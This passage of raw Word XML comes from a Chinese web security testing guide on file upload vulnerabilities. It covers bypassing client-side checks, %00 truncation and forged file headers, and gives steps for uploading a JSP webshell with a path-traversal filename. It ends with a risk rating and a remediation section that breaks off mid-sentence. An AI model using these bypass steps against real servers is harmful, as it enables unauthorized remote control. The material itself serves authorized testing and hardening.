        <w:t>，上传时拦截，再把文件扩展名更改为</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可，如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0033369A" w14:textId="3FA3FBCD"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511B0B16" wp14:editId="4517DDC7">
            <wp:extent cx="4216400" cy="21717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6400" cy="2171700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C26DE3" w14:textId="77777777"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当然也有不是基于</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证的上传，例如一些中间件</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx,</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP,FCK</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑器等等的解析漏洞，其上传绕过方式也是多种多样。通过对上传页面进行检查，常见的文件上传检查针对文件类型进行，可以使用手动修改</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包然后添加</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%00</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节用于截断某些函数对文</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>件名的判断。除了修改文件名来绕过类型检查外，还可以修改文件头来伪造文件头，欺骗文件上传检查，如图，修改文件头中的类型来进行绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FE834C" w14:textId="4C7A7D47"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15851FF7" wp14:editId="1222649C">
            <wp:extent cx="4241800" cy="812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812800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FFB6B4" w14:textId="77777777" w:rsidR="00CA34B8" w:rsidRPr="000D173B" w:rsidRDefault="00CA34B8" w:rsidP="000D173B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上为几种常见的上传，更多的还需自行研究，进行上传绕过。以下为总体的测试流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B10E4CB" w14:textId="06CD1B5D" w:rsidR="00CA34B8"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登陆网站，并打开文件上传页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12260B94" w14:textId="059F6574" w:rsidR="00CA34B8"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点击“浏览”按钮，并选择本地的一个</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件（比如</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），确认上传。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5896D959" w14:textId="4F03BC20" w:rsidR="00CA34B8"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如果客户端脚本限制了上传文件的类型（比如允许</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gif</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件），则把</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更名为</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker.gif</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；配置</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）进行</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求拦截；重新点击“浏览”按钮，并选择</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker.gift</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，确认上传。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1D0818" w14:textId="5D54FF2D" w:rsidR="00CA34B8"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在</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebScarab</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截的</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求数据中，将</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker.gif</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改为</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再发送请求数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC559D" w14:textId="20CE3C3D" w:rsidR="00CA34B8"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登陆后台服务器，用命令</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>find / -name hacker.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件存放的路径。如果可以直接以</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式访问，则构造访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并通过浏览器访问</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果可以正常访问，则已经取得</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebShell</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，测试结束。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法通过</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式访问，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存放在</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/home/tmp/</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下，而</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/home/tomcat/webapps</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录对应</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://www.example.com/</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则进行下一步</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD3A27" w14:textId="22E9B04D" w:rsidR="00CA34B8"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重复</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>～</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截的</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求数据中，将</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacker.gif</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改为</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>../tomcat/webapps/hacker.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再发送请求数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B7BA3E" w14:textId="15E3625B" w:rsidR="009C1845" w:rsidRPr="000D173B" w:rsidRDefault="00CA34B8" w:rsidP="000D173B">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在浏览器地址栏输入</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://www.example.com/hacker.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，访问该后门程序，取得</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebShell</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，结束检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053BFD85" w14:textId="1D8C11CE" w:rsidR="009C1845" w:rsidRPr="000D173B" w:rsidRDefault="00C24790" w:rsidP="000D173B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009C1845" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00A25578" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者直接上传</w:t>
      </w:r>
      <w:r w:rsidR="00A25578" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="00A25578" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到服务器，从而远程控制服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69799940" w14:textId="77777777" w:rsidR="009C1845" w:rsidRPr="000D173B" w:rsidRDefault="009C1845" w:rsidP="000D173B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F92674" w14:textId="30544CE6" w:rsidR="009C1845" w:rsidRPr="000D173B" w:rsidRDefault="00A25578" w:rsidP="000D173B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：成功上传恶意脚本文件，并解析</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="0012714C" w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09453A2A" w14:textId="77777777" w:rsidR="009C1845" w:rsidRPr="000D173B" w:rsidRDefault="009C1845" w:rsidP="000D173B">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B82EE8E" w14:textId="77777777" w:rsidR="00F65808" w:rsidRPr="000D173B" w:rsidRDefault="00F65808" w:rsidP="000D173B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最有效的，将文件上传目录直接设置为不可执行，对于</w:t>
      </w:r>
      <w:r w:rsidRPr="000D173B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
